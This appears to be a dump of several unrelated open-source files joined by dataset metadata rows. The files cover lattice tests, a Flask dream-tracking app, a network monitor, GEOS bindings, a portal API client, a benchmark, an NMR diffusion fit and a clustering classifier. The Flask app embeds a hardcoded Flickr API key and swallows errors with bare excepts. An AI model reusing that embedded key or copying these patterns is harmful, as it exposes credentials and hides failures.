(3, 6, 5)),
make_base_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
(3, 6, 5)),
make_body_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
(3, 6, 5)),
make_monoclinic_lattice('test', (0.5, 0.6, 0.7), 0.4,
(3, 6, 5)),
make_base_centered_monoclinic_lattice('test', (0.5, 0.6, 0.7),
0.4, (3, 6, 5)),
make_triclinic_lattice('test', (0.5, 0.6, 0.7), (0.4, 0.3, 0.2),
(3, 6, 5))])
class TestVTKLatticeNodeOperations(
CheckLatticeNodeOperations, unittest.TestCase):
def container_factory(self, name, primitive_cell, size, origin):
return VTKLattice.empty(name, primitive_cell, size, origin)
def supported_cuba(self):
return supported_cuba()
class TestVTKLatticeNodeCoordinates(
CheckLatticeNodeCoordinates, unittest.TestCase):
def container_factory(self, name, primitive_cell, size, origin):
return VTKLattice.empty(name, primitive_cell, size, origin)
def supported_cuba(self):
return supported_cuba()
class TestVTKLattice(unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(
LatticeNode, partial(compare_lattice_nodes, testcase=self))
def test_get_node_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when
node = vtk_lattice.get((1, 1, 0))
# then
self.assertEqual(
node, LatticeNode(
(1, 1, 0),
data=DataContainer(VELOCITY=(1, 1, 0))))
def test_iter_nodes_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when/then
for node in vtk_lattice.iter(item_type=CUBA.NODE):
self.assertEqual(
node, LatticeNode(
node.index,
data=DataContainer(VELOCITY=node.index)))
self.assertEqual(sum(1 for _ in vtk_lattice.iter(
item_type=CUBA.NODE)), 120)
def test_update_nodes_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
node = vtk_lattice.get((1, 1, 0))
# when
node.data = DataContainer(VELOCITY=(1, 54, 0.3))
vtk_lattice.update((node,))
# then
new_node = vtk_lattice.get((1, 1, 0))
self.assertEqual(
new_node, LatticeNode(
(1, 1, 0),
data=DataContainer(VELOCITY=(1, 54, 0.3))))
def test_get_coordinate_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when/then
for node in lattice.iter(item_type=CUBA.NODE):
assert_array_equal(
vtk_lattice.get_coordinate(node.index),
lattice.get_coordinate(node.index))
def test_initialization_with_unknown_type(self):
        # given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
data = VTKLattice.from_lattice(lattice)
primitive_cell = PrimitiveCell(lattice.primitive_cell.p1,
lattice.primitive_cell.p2,
lattice.primitive_cell.p3,
"Cubic")
# when/then
with self.assertRaises(ValueError):
VTKLattice(
name=lattice.name, primitive_cell=primitive_cell,
data_set=data.data_set)
def test_initialization_with_unfamiliar_dataset(self):
# given
data_set = tvtk.UnstructuredGrid(points=[(0, 0, 0,), (1, 1, 1)])
primitive_cell = PrimitiveCell.for_cubic_lattice(1.)
# when/then
with self.assertRaises(TypeError):
VTKLattice(
name='test', primitive_cell=primitive_cell,
data_set=data_set)
def test_create_empty_with_unknown_type(self):
primitive_cell = PrimitiveCell((1., 0., 0.), (0., 1., 0.),
(0., 0., 1.), "Cubic")
# when/then
with self.assertRaises(ValueError):
VTKLattice.empty(
name='test', primitive_cell=primitive_cell, size=(3, 4, 5),
origin=(0.0, 0.0, 0.0))
def test_create_from_unfamiliar_dataset(self):
# given
data_set = tvtk.UnstructuredGrid(points=[(0, 0, 0,), (1, 1, 1)])
# when/then
with self.assertRaises(TypeError):
VTKLattice.from_dataset(name='test', data_set=data_set)
@given(lattice_types)
def test_initialization_with_dataset(self, lattice):
# given
expected = VTKLattice.from_lattice(lattice)
# when
vtk_lattice = VTKLattice.from_dataset('test', expected.data_set)
# then
self.assertEqual(vtk_lattice.primitive_cell.bravais_lattice,
lattice.primitive_cell.bravais_lattice)
@given(lattice_types)
def test_creating_a_vtk_lattice_from_cuds_lattice(self, lattice):
# when
vtk_lattice = VTKLattice.from_lattice(lattice)
# then
self.assertEqual(vtk_lattice.primitive_cell.bravais_lattice,
lattice.primitive_cell.bravais_lattice)
self.assertEqual(vtk_lattice.data, lattice.data)
self.assertEqual(vtk_lattice.size, lattice.size)
assert_array_equal(vtk_lattice.origin, lattice.origin)
assert_array_equal(vtk_lattice.primitive_cell.p1,
lattice.primitive_cell.p1)
assert_array_equal(vtk_lattice.primitive_cell.p2,
lattice.primitive_cell.p2)
assert_array_equal(vtk_lattice.primitive_cell.p3,
lattice.primitive_cell.p3)
def test_data_setter(self):
# when
primitive_cell = PrimitiveCell.for_cubic_lattice(1.)
vtk_lattice = VTKLattice.empty('test', primitive_cell, (2, 3, 4),
(0, 0, 0))
vtk_lattice.data = {CUBA.TEMPERATURE: 40.}
# then
self.assertIsInstance(vtk_lattice.data, DataContainer)
def test_exception_create_dataset_with_inconsistent_lattice_type(self):
bad_lattice_types = (BravaisLattice.CUBIC,
BravaisLattice.TETRAGONAL,
BravaisLattice.ORTHORHOMBIC)
for lattice_type in bad_lattice_types:
# when
primitive_cell = PrimitiveCell((1., 0., 0.), # require PolyData
(0.5, 0.5, 0.),
(0., 0., 1.),
lattice_type)
lattice = Lattice('test', primitive_cell, (2, 3, 4),
(0., 0., 0.))
# then
with self.assertRaises(ValueError):
VTKLattice.from_lattice(lattice)
def add_velocity(self, lattice):
new_nodes = []
for node in lattice.iter(item_type=CUBA.NODE):
node.data[CUBA.VELOCITY] = node.index
new_nodes.append(node)
lattice.update(new_nodes)
if __name__ == '__main__':
unittest.main()
|
bsd-2-clause
| -8,452,465,650,325,802,000
| 37.468
| 76
| 0.580638
| false
| 3.464337
| true
| false
| false
|
whiskeylover/idreamoftoast
|
toast/app.py
|
1
|
6684
|
import datetime
import json
from urllib.parse import unquote
from urllib.request import urlopen
from flask import jsonify, Response
from peewee import CharField, DateTimeField, IntegerField, Model
import config
#-------------------------------------------------------------------------------
# Constants
#-------------------------------------------------------------------------------
MAX_TOP_DREAMS = 8
EXTERNAL_RESOURCE_REFRESH_FREQ = 30
#-------------------------------------------------------------------------------
# Config
#-------------------------------------------------------------------------------
app = config.get_app()
db = config.get_database()
#-------------------------------------------------------------------------------
# Models
#-------------------------------------------------------------------------------
class Dream(Model):
"""" Dream model. """
name = CharField()
count = IntegerField(default=0)
picURL = CharField(null=True)
picURLthn = CharField(null=True)
definition = CharField(null=True)
created_on = DateTimeField(default=datetime.datetime.now)
modified_on = DateTimeField(default=datetime.datetime.now)
class Meta:
database = db
#-------------------------------------------------------------------------------
# Methods
#-------------------------------------------------------------------------------
def init_db():
""" Initialize database. """
db.connect()
if not Dream.table_exists():
Dream.create_table()
def get_dreams(order, limit):
""" Helper method for getting dreams. """
dreams = Dream.select().where(Dream.count > 0).order_by(order)[:limit]
return [{'name':d.name, 'count':d.count, 'definition': d.definition, 'picURL': d.picURL, 'picURLthn': d.picURLthn} for d in dreams]
def get_dream(dream):
""" Helper method for getting a single dream. """
d = Dream.select().where(Dream.name == dream.lower()).first()
if d is None:
d = Dream.create(name=dream.lower(), count=0, picURL=get_flickrpicURL(dream), picURLthn=get_flickrpicURL(dream), definition=get_urbandictionary(dream))
return {'name':d.name, 'count':d.count, 'definition': d.definition, 'picURL': d.picURL, 'picURLthn': d.picURLthn}
#-------------------------------------------------------------------------------
# Routes / Controllers
#-------------------------------------------------------------------------------
@app.route("/dream/define/<term>")
def get_urbandictionary(term):
try:
response = urlopen('http://api.urbandictionary.com/v0/define?term=' + term.replace(" ", "+"))
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s definition")
return j['list'][0]['definition']
except:
return ""
@app.route("/dream/picURL/<term>")
def get_flickrpicURL(term):
api_key = 'b60ce2a4db0b09dc4e9e895efe6d660e'
URL = 'https://api.flickr.com/services/rest/?method=flickr.photos.search&' + \
'api_key=' + api_key + \
'&tags=' + term.replace(" ", "+") + \
'&privacy_filter=1&format=json&nojsoncallback=1'
try:
response = urlopen(URL)
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s picURL")
return "https://farm{0}.staticflickr.com/{1}/{2}_{3}_z.jpg".format( \
j['photos']['photo'][0]['farm'], \
j['photos']['photo'][0]['server'], \
j['photos']['photo'][0]['id'], \
j['photos']['photo'][0]['secret'])
except:
return "assets/img/888888.png"
@app.route("/dream/picURLthn/<term>")
def get_flickrpicURLthn(term):
api_key = 'b60ce2a4db0b09dc4e9e895efe6d660e'
URL = 'http://api.flickr.com/services/rest/?method=flickr.photos.search&' + \
'api_key=' + api_key + \
'&tags=' + term.replace(" ", "+") + \
'&privacy_filter=1&format=json&nojsoncallback=1'
try:
response = urlopen(URL)
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s picURLthn")
return "http://farm{0}.staticflickr.com/{1}/{2}_{3}_q.jpg".format( \
j['photos']['photo'][0]['farm'], \
j['photos']['photo'][0]['server'], \
j['photos']['photo'][0]['id'], \
j['photos']['photo'][0]['secret'])
except:
return "assets/img/888888thn.png"
@app.route("/dreams/add/<dream>")
def add_dream(dream):
d, created = Dream.get_or_create(name=unquote(dream.lower()))
    d.count += 1
# if the record has just been created, fetch the picURL and definition
if created:
print("Creating new dream")
d.created_on = datetime.datetime.now()
d.modified_on = datetime.datetime.now()
d.picURL = get_flickrpicURL(d.name)
d.picURLthn = get_flickrpicURLthn(d.name)
d.definition = get_urbandictionary(d.name)
else:
print("Fetching existing dream")
        # refresh the cached definition and URLs if the record has not been
        # updated for more than EXTERNAL_RESOURCE_REFRESH_FREQ days
        days_old = 0
        try:
            days_old = (datetime.datetime.now() - d.modified_on).days
        except:
            days_old = 0
if days_old >= EXTERNAL_RESOURCE_REFRESH_FREQ:
d.picURL = get_flickrpicURL(d.name)
d.picURLthn = get_flickrpicURLthn(d.name)
d.definition = get_urbandictionary(d.name)
d.modified_on = datetime.datetime.now()
d.save()
return jsonify(data={'id': d.id,
'count': d.count})
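# Example request (illustrative values): GET /dreams/add/flying
# -> {"data": {"id": 1, "count": 1}} on the first call; count increments on repeats.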
@app.route("/dreams/top")
def top_dreams():
a = get_dreams(Dream.count.desc(), MAX_TOP_DREAMS)
#Response.headers.add('Access-Control-Allow-Origin', '*')
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#return jsonify(data=get_dreams(Dream.count.desc(), MAX_TOP_DREAMS))
@app.route("/dreams/recent")
def recent_dreams():
a = get_dreams(Dream.modified_on.desc(), MAX_TOP_DREAMS)
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#return jsonify(data=get_dreams(Dream.modified_on.desc(), MAX_TOP_DREAMS))
@app.route("/dreams/get/<dream>")
def get_single_dream(dream):
a = get_dream(unquote(dream.lower()))
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#-------------------------------------------------------------------------------
# Main
#-------------------------------------------------------------------------------
if __name__ == "__main__":
# Development only! Reloads server on file change.
init_db()
app.debug = True
app.run()
|
apache-2.0
| 3,691,948,276,489,078,300
| 33.8125
| 159
| 0.529473
| false
| 3.597417
| false
| false
| false
|
gonicus/gosa
|
common/src/gosa/common/network.py
|
1
|
3494
|
# This file is part of the GOsa framework.
#
# http://gosa-project.org
#
# Copyright:
# (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.
import dbus
from gosa.common.components.dbus_runner import DBusRunner
from logging import getLogger
NM_STATE_UNKNOWN = 0
NM_STATE_ASLEEP = 10
NM_STATE_DISCONNECTED = 20
NM_STATE_DISCONNECTING = 30
NM_STATE_CONNECTING = 40
NM_STATE_CONNECTED_LOCAL = 50
NM_STATE_CONNECTED_SITE = 60
NM_STATE_CONNECTED_GLOBAL = 70
class Monitor(object):
def __init__(self, callback=None):
self.__callback = callback
self.log = getLogger(__name__)
self.__running = False
self.__thread = None
self.log.info("Initializing network state monitor")
# Initialize DBUS
dr = DBusRunner.get_instance()
self.__bus = dr.get_system_bus()
# Register actions to detect the network state
self.__upower_actions()
self.__network_actions()
# Get current state
try:
proxy = self.__bus.get_object('org.freedesktop.NetworkManager', '/org/freedesktop/NetworkManager')
iface = dbus.Interface(proxy, 'org.freedesktop.DBus.Properties')
version = str(iface.Get("org.freedesktop.NetworkManager", "Version"))
            if tuple(int(x) for x in version.split(".")[:2]) < (0, 9):
self.log.warning("network-manager is too old: defaulting to state 'online'")
self.__state = True
else:
self.__state = iface.Get("org.freedesktop.NetworkManager", "State") in [NM_STATE_CONNECTED_SITE, NM_STATE_CONNECTED_GLOBAL]
except:
self.log.warning("no network-manager detected: defaulting to state 'online'")
self.__state = True
def is_online(self):
return self.__state
def __upower_actions(self):
try:
proxy = self.__bus.get_object('org.freedesktop.UPower', '/org/freedesktop/UPower')
iface = dbus.Interface(proxy, 'org.freedesktop.UPower')
iface.connect_to_signal("Sleeping", self.__upower_sleeping)
except:
self.log.warning("no UPower detected: will not be able to suspend network")
def __network_actions(self):
try:
proxy = self.__bus.get_object('org.freedesktop.NetworkManager', '/org/freedesktop/NetworkManager')
iface = dbus.Interface(proxy, 'org.freedesktop.NetworkManager')
iface.connect_to_signal("StateChanged", self.__network_state)
except:
self.log.warning("no network-manager detected: will not be able to suspend or activate network")
def __upower_sleeping(self):
self.log.info("network down")
self.__state = False
if self.__callback:
self.__callback(False)
def __network_state(self, state):
if state in [NM_STATE_CONNECTED_SITE, NM_STATE_CONNECTED_GLOBAL]:
if self.__state is False:
self.log.info("network up")
self.__state = True
if self.__callback:
self.__callback(True)
elif self.__state is True:
self.log.info("network down")
self.__state = False
if self.__callback:
self.__callback(False)
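# Usage sketch (assumes a running DBusRunner main loop; the callback below is
# illustrative, not part of this module):
#
#   def on_change(online):
#       print("network is %s" % ("up" if online else "down"))
#   monitor = Monitor(callback=on_change)
#   if monitor.is_online():
#       pass  # start network-dependent services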
|
lgpl-2.1
| -8,663,401,339,332,908,000
| 31.962264
| 139
| 0.603892
| false
| 3.997712
| false
| false
| false
|
yephper/django
|
django/contrib/gis/geos/prototypes/predicates.py
|
1
|
1630
|
"""
This module houses the GEOS ctypes prototype functions for the
unary and binary predicate operations on geometries.
"""
from ctypes import c_char, c_char_p, c_double
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
# ## Binary & unary predicate factories ##
class UnaryPredicate(GEOSFuncFactory):
"For GEOS unary predicate functions."
argtypes = [GEOM_PTR]
restype = c_char
errcheck = staticmethod(check_predicate)
class BinaryPredicate(UnaryPredicate):
"For GEOS binary predicate functions."
argtypes = [GEOM_PTR, GEOM_PTR]
# ## Unary Predicates ##
geos_hasz = UnaryPredicate('GEOSHasZ')
geos_isclosed = UnaryPredicate('GEOSisClosed')
geos_isempty = UnaryPredicate('GEOSisEmpty')
geos_isring = UnaryPredicate('GEOSisRing')
geos_issimple = UnaryPredicate('GEOSisSimple')
geos_isvalid = UnaryPredicate('GEOSisValid')
# ## Binary Predicates ##
geos_contains = BinaryPredicate('GEOSContains')
geos_covers = BinaryPredicate('GEOSCovers')
geos_crosses = BinaryPredicate('GEOSCrosses')
geos_disjoint = BinaryPredicate('GEOSDisjoint')
geos_equals = BinaryPredicate('GEOSEquals')
geos_equalsexact = BinaryPredicate('GEOSEqualsExact', argtypes=[GEOM_PTR, GEOM_PTR, c_double])
geos_intersects = BinaryPredicate('GEOSIntersects')
geos_overlaps = BinaryPredicate('GEOSOverlaps')
geos_relatepattern = BinaryPredicate('GEOSRelatePattern', argtypes=[GEOM_PTR, GEOM_PTR, c_char_p])
geos_touches = BinaryPredicate('GEOSTouches')
geos_within = BinaryPredicate('GEOSWithin')
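# Usage sketch (these prototypes are normally reached through GEOSGeometry, whose
# `.ptr` attribute holds the underlying GEOM_PTR; the WKT values are illustrative):
#
#   from django.contrib.gis.geos import GEOSGeometry
#   poly = GEOSGeometry('POLYGON((0 0, 0 2, 2 2, 2 0, 0 0))')
#   pt = GEOSGeometry('POINT(1 1)')
#   geos_contains(poly.ptr, pt.ptr)  # errcheck converts the c_char result to a bool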
|
bsd-3-clause
| -4,548,278,871,508,046,000
| 35.906977
| 98
| 0.752761
| false
| 3.551198
| false
| false
| false
|
DavidWhittingham/agsadmin
|
agsadmin/sharing_admin/community/groups/Group.py
|
1
|
1457
|
from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str,
super, zip)
from ...._utils import send_session_request
from ..._PortalEndpointBase import PortalEndpointBase
from .CreateUpdateGroupParams import CreateUpdateGroupParams
class Group(PortalEndpointBase):
@property
def id(self):
return self._pdata["id"]
@property
def _url_full(self):
return "{0}/{1}".format(self._url_base, self.id)
def __init__(self, requests_session, url_base, id):
super().__init__(requests_session, url_base)
self._pdata = {"id": id}
def get_properties(self):
"""
Gets the properties of the item.
"""
return self._get()
def update(self, update_group_params, clear_empty_fields=False):
"""
Updates the group properties.
"""
update_group_params = update_group_params._get_params() if isinstance(
update_group_params, CreateUpdateGroupParams) else update_group_params.copy()
if not "clearEmptyFields" in update_group_params:
update_group_params["clearEmptyFields"] = clear_empty_fields
r = self._create_operation_request(self, "update", method="POST", data=update_group_params)
return send_session_request(self._session, r).json()
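# Usage sketch (the session, portal URL and group id are hypothetical placeholders):
#
#   group = Group(session, "https://portal.example.com/sharing/rest/community/groups",
#                 "abc123")
#   props = group.get_properties()
#   group.update({"description": "updated"}, clear_empty_fields=True)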
|
bsd-3-clause
| 7,639,082,891,741,181,000
| 32.906977
| 117
| 0.643102
| false
| 3.937838
| false
| false
| false
|
segfaulthunter/asynchia
|
benchmark/ee_parse.py
|
1
|
2223
|
# -*- coding: us-ascii -*-
# asynchia - asynchronous networking library
# Copyright (C) 2009 Florian Mayer <florian.mayer@bitsrc.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import time
import operator
import itertools
import asynchia.ee
import asynchia.maps
import asynchia.util
import benchutil
class SendAllTransport(asynchia.SendallTrait, asynchia.SocketTransport):
pass
def mock_handler(mp, inbuf):
a, b = asynchia.util.socketpair()
sender = SendAllTransport(mp, a)
sender.sendall(inbuf)
recvr = asynchia.SocketTransport(mp, b)
return recvr
class ParseEE(benchutil.AsyncBenchmark):
def __init__(self, mp, size):
self.trnsp = mock_handler(mp, os.urandom(size))
        sub = itertools.cycle(range(250, 20000))  # cycle yields ints; repeat() would yield the whole list each time
chunks = []
x = size
while x > 0:
chunks.append(min(x, sub.next()))
x -= chunks[-1]
self.ptcl = reduce(
operator.add,
map(asynchia.ee.DelimitedStringCollector, chunks)
)
self.ptcl.onclose = lambda _: self.submit_async(time.time())
def run(self):
hndl = asynchia.ee.Handler(self.trnsp, self.ptcl)
def done(_):
raise asynchia.SocketMapClosedError
if __name__ == '__main__':
if len(sys.argv) >= 3:
sample = int(sys.argv[1])
len_ = int(sys.argv[2])
else:
sample = 50
len_ = 5000000
mp = asynchia.maps.DefaultSocketMap()
run = benchutil.Runner([ParseEE(mp, len_) for _ in xrange(sample)], done)
run.start()
mp.run()
print run.result
|
gpl-3.0
| -3,150,133,316,793,390,600
| 26.7875
| 77
| 0.662618
| false
| 3.5625
| false
| false
| false
|
mrosenstihl/PulsePrograms
|
autoPFGStimulatedEcho_const_T1/analyse.py
|
1
|
2319
|
import re, os,sys
import numpy as N
from tables import *
import scipy.odr
import pylab as P
conv = 6.36e-5
gamma = 2.67522e8
start = 50
stop = 250
def diffusion(p,x):
sig = N.exp(-p[0]*x)+p[1]
return sig
hdf = openFile(sys.argv[1])
temperature_runs = [run for run in hdf.root.data_pool if run._v_name.startswith('dir_')]
results = {}
for temperature in temperature_runs:
tbvt = temperature._v_name
print tbvt
for run in hdf.walkNodes(temperature):
print run._v_name
if run._v_name.startswith('dict_grad'):
dwell = run.indices.col('dwelltime')
delta = float(run._v_attrs.description_delta)
tau = float(run._v_attrs.description_tau)
tm = float(run._v_attrs.description_tm)
dac = float(run._v_attrs.description_dac)
# b Faktor
bfac = (gamma*dac*delta*conv)**2*( (tau+tm) / 4 + delta/12. + 5.*delta/16./N.pi**2)
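            # As encoded above: b = (gamma*g*delta)^2 * ((tau+tm)/4 + delta/12 + 5*delta/(16*pi^2)),
            # with effective gradient g = dac*conv. The 5/(16*pi^2) term is consistent with
            # sine-shaped gradient pulses (an inference from the formula, not stated in this file).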
real,imag = run.accu_data[:,0],run.accu_data[:,2]
mag = N.sqrt(real**2 + imag**2)
# Signalamplitude
sig = mag[start:stop].mean()-mag[-1024:].mean()
sig_err= mag[-1024:].std()/N.sqrt((stop-start))
try:
results[tbvt].append([bfac,sig,sig_err,delta,tau,tm,dac])
except:
results[tbvt] = []
results[tbvt].append([bfac,sig,sig_err,delta,tau,tm,dac])
results[tbvt] = N.array(results[tbvt])
x = results[tbvt][:,0]
y = results[tbvt][:,1]
y_err = results[tbvt][:,2]
delta = results[tbvt][:,3]
tau = results[tbvt][:,4]
tm = results[tbvt][:,5]
dac = results[tbvt][:,6]
# Create sets
deltas = set(delta)
taus = set(tau)
tms = set(tm)
P.subplot(211)
# Select the single measurements sets (same tau,tm,delta) and normalize them to g==0
    mask = y > 5e-2  # boolean mask (the original [y>5e-2] list form is deprecated numpy indexing)
for de in deltas:
for ta in taus:
for t in tms:
ind_de = delta==de
ind_ta = tau==ta
ind_t = tm==t
ind_dac0 = dac==0
# This is a set
ind = ind_de*ind_ta*ind_t
ind_norm = ind_de*ind_ta*ind_t*ind_dac0
y_err[ind] /= y[ind_norm]
y[ind] /= y[ind_norm]
x_err = x*0.05
#assume 5% error from calibration
data = scipy.odr.Data(x=x[mask],y=y[mask],wd=y_err[mask])
model = scipy.odr.Model(diffusion)
odr = scipy.odr.ODR(data,model,beta0=[2e-13,0.1], ifixx=(1,))
odr.run()
print "ODR Result"
odr.output.pprint()
print "Polyfit"
print N.polyfit(x[y>5e-2],N.log(y[y>5e-2]),1)
P.semilogy(x[mask],y[mask],'o')
P.show()
|
bsd-2-clause
| -8,492,228,953,505,733,000
| 24.483516
| 88
| 0.626994
| false
| 2.373593
| false
| false
| false
|
emrecimen/CIOL-ICF
|
ICF_Training_Test.py
|
1
|
8182
|
# This file is the implementation of the algorithm 1 and includes the main function
# One can use this file if the training and test files are separated.
# Inputs can be tuned in the corresponding area
# The accuracy rates and all function parameters are printed to the console as output
# Datasets can be provided as csv or arff files.
# If there are n classes, class labels should be integers 1 to n in the last column
import numpy as np
from gurobipy import *
import math
import csv
import arff
import time
import ICF_Purity
# Calculating the separation function. Step 2 of Algorithm 1.
def PCFl2( Ajr, Bjr, cjr, purity):
distb =np.sqrt(np.power(Bjr-cjr,2).sum(axis=1))
dista =np.sqrt(np.power(Ajr-cjr,2).sum(axis=1))
gamma=(np.max(dista)+np.min(distb))/2.0
return { 'gamma': gamma, 'c':cjr, 'purity':purity}
# Solving P_r. LP model in Step 2 of Algorithm 1.
def PCF(Ajr, Bjr, cjr,status, purity):
# Create optimization model
m = Model('PCF')
# Create variables
gamma = m.addVar(vtype=GRB.CONTINUOUS, lb=1, name='gamma')
w = range(nn)
for a in range(nn):
w[a] = m.addVar(vtype=GRB.CONTINUOUS, name='w[%s]' % a)
ksi = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='ksi')
m.update()
hataA = {}
hataB = {}
for i in range(len(Ajr)):
hataA[i] = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='hataA[%s]' % i)
m.update()
m.addConstr(quicksum((Ajr[i][j] - cjr[j]) * w[j] for j in range(len(cjr))) + (ksi * quicksum(math.fabs(Ajr[i][j] - cjr[j]) for j in range(len(cjr)))) - gamma + 1.0 <= hataA[i])
for z in range(len(Bjr)):
hataB[z] = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='hataB[%s]' % z)
m.update()
m.addConstr(quicksum((Bjr[z][r] - cjr[r]) * -w[r] for r in range(len(cjr))) - (ksi * quicksum(math.fabs(Bjr[z][q] - cjr[q]) for q in range(len(cjr)))) + gamma + 1.0 <= hataB[z])
m.update()
m.setObjective((quicksum(hataA[k] for k in range(len(hataA))) / len(hataA))+(quicksum(hataB[l] for l in range(len(hataB))) / len(hataB)), GRB.MINIMIZE)
m.update()
# Compute optimal solution
m.optimize()
m.write('model.sol')
status.append(m.Status)
ww=[]
for i in range(len(cjr)):
ww.append(w[i].X)
return {'s':status,'w': ww, 'gamma': gamma.x, 'ksi': ksi.x, 'c':cjr, 'purity':purity}
def findgj(Aj, centroids, B,status, Rs, Rbs, purity):
gj=[]
r=0
for Ajr in Aj:
if purity[r]<tolpr:
newAjr, newB= ICF_Purity.eliminateWithR(Ajr, B, centroids[r], Rs[r], Rbs[r])
sonuc = PCF(newAjr, newB, centroids[r],status, purity[r])
status=sonuc['s']
gj.append(sonuc)
else:
newAjr, newB= ICF_Purity.eliminateWithR(Ajr, B, centroids[r], Rs[r], Rbs[r])
sonuc = PCFl2(newAjr, newB, centroids[r], purity[r])
gj.append(sonuc)
r=r+1
return status,gj
def pcfDeger(w, ksi, gamma, c, x):
deger = np.dot(w,x-c) + ksi*np.sum(abs(x-c)) -gamma
return deger
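# pcfDeger evaluates g(x) = <w, x - c> + ksi*||x - c||_1 - gamma; a negative value
# places x inside the cluster's polyhedral region, which is how sinifBul and
# egitimOraniniHesapla assign class membership below.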
def pcfl2Deger(gamma,c, x):
deger =np.sqrt(np.sum(np.square(x-c))) - gamma
return deger
def sinifBul(data):
sinifTahmini=[]
g_deger=[]
for d in data:
t=1
enkDeger=float('inf')
gj_deger=[]
for gj in g:
gjr_deger=[]
for gjr in gj:
if gjr['purity']>tolpr:
fonkDeger= pcfl2Deger(gjr['gamma'],gjr['c'],d[0:-1])
else:
fonkDeger = pcfDeger(gjr['w'],gjr['ksi'],gjr['gamma'],gjr['c'],d[0:-1])
gjr_deger.append(fonkDeger)
if (fonkDeger<enkDeger):
enkDeger=fonkDeger
sinifT=t
t=t+1
gj_deger.append(gjr_deger)
g_deger.append(gj_deger)
sinifTahmini.append(sinifT)
return sinifTahmini
def egitimOraniniHesapla(gj, sinifEtiket, dataTrain):
dogruSayisiA=0.0
dogruSayisiB=0.0
say=0.0
for d in dataTrain:
enkDeger=float('inf')
for gjr in gj:
fonkDeger = pcfDeger(gjr['w'],gjr['ksi'],gjr['gamma'],gjr['c'],d[0:-1])
if (fonkDeger<enkDeger):
enkDeger=fonkDeger
if (enkDeger<0):
if d[-1]==sinifEtiket:
dogruSayisiA=dogruSayisiA+1
else:
say+=1
else:
if d[-1]!=sinifEtiket:
dogruSayisiB=dogruSayisiB+1
say+=1
egitimOrani=(float(dogruSayisiA)+float(dogruSayisiB))/len(dataTrain)
return egitimOrani
# Read arff file
def arffOku(dosya):
d = arff.load(open(dosya, 'rb'))
v=[]
for dd in d['data']:
satir=[]
for ddd in dd:
satir.append(float(ddd))
v.append(satir)
v=np.array(v)
return v
# Read csv file
def readData(dosya):
dosya = open(dosya)
okuyucu = csv.reader(dosya, quotechar=',')
data = []
for row in okuyucu:
satirVeri = []
for deger in row:
satirVeri.append(float(deger))
data.append(satirVeri)
data=np.array(data)
return data
###################### MAIN FUNCTION STARTS HERE ###############################
start_time = time.time()
###################### INPUTS ###############################
dataTrain = readData('/Users/exampleTrain.csv') #Dataset paths should be given here.
dataTest = readData('/Users/exampleTest.csv')
#dataTrain = arffOku('exampleTrain.arff')
tolpr = 0.90  # epsilon_1 in Algorithm 1
# This threshold decides whether an LP is necessary in the ICF algorithm.
# High values increase the chance of calling the LP for PCF construction,
# while low values favour algebraic cone construction (corresponding to a
# faster, but possibly lower-resolution result).
######################
# mm=len(data) # row size
nn=len(dataTrain[0])-1 # feature size
sinifSayisi = int(np.max(dataTrain[:,-1])) # classes must be labelled 1 to n in the last column
status = []
g=[]
for sinif in range(1,sinifSayisi+1):
Aj = []
Bj = []
for d in dataTrain:
if d[-1] == sinif:
Aj.append(d[ 0:-1])
else:
Bj.append(d[ 0:-1])
Aj=np.array(Aj)
Bj=np.array(Bj)
centroids, clusters, resR, resRB, purities = ICF_Purity.getPureClusters(Aj, Bj) # Call algorithm 2 here
status,gj=findgj(clusters, centroids, Bj,status,resR, resRB, purities ) # Calling Algorithm 1, Step 1-2
g.append(gj)
#--------------------------------TESTING---------------------------------------------------- '''
sinifTahminiTrain=sinifBul(dataTrain)
gercekSinifTrain=dataTrain[:,-1]
sinifTahminiTest=sinifBul(dataTest)
gercekSinifTest=dataTest[:,-1]
#Calculating training accuracy
EgitimDogrulukOrani= round(100.0*(np.sum((sinifTahminiTrain==gercekSinifTrain)))/len(dataTrain),2)
#Calculating test accuracy
TestDogrulukOrani= round(100.0*(np.sum((sinifTahminiTest==gercekSinifTest) ))/len(dataTest),2)
print "########################################################"
j=1
for gj in g:
r=1
print "For class ", j,"the classifiers are:"
for gjr in gj:
